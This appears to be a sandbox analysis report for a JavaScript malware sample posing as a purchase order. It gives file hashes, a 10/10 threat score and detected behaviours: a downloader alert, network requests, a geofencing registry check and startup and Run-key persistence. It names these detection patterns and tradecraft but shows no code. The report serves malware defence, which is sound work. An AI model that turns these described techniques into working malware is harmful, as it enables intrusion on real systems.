General
-
Target
PO-Order 4500324718.js
-
Size
45KB
-
Sample
220628-l6sbhsgfer
-
MD5
f8386388be14928dcf22d1e1752be75c
-
SHA1
0d9f55e0580d39acd03651379366d172517638b4
-
SHA256
ddb9205dd6921da69e80e86a70c935be328dfd6c9559e6bf1a7d7dda92267ceb
-
SHA512
3a61511f6b2c259aeb6d97d6cb9ff2a9d316bb1029ee647c3b45c53ed03188c12d6d9f2710e37e87035943c7fc6804df37af614cf0315dac5cdcc4e4d4ae442b
Static task
static1
Behavioral task
behavioral1
Sample
PO-Order 4500324718.js
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
PO-Order 4500324718.js
Resource
win10v2004-20220414-en
Malware Config
Targets
-
-
Target
PO-Order 4500324718.js
-
Size
45KB
-
MD5
f8386388be14928dcf22d1e1752be75c
-
SHA1
0d9f55e0580d39acd03651379366d172517638b4
-
SHA256
ddb9205dd6921da69e80e86a70c935be328dfd6c9559e6bf1a7d7dda92267ceb
-
SHA512
3a61511f6b2c259aeb6d97d6cb9ff2a9d316bb1029ee647c3b45c53ed03188c12d6d9f2710e37e87035943c7fc6804df37af614cf0315dac5cdcc4e4d4ae442b
Score10/10-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Blocklisted process makes network request
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Drops startup file
-
Adds Run key to start application
-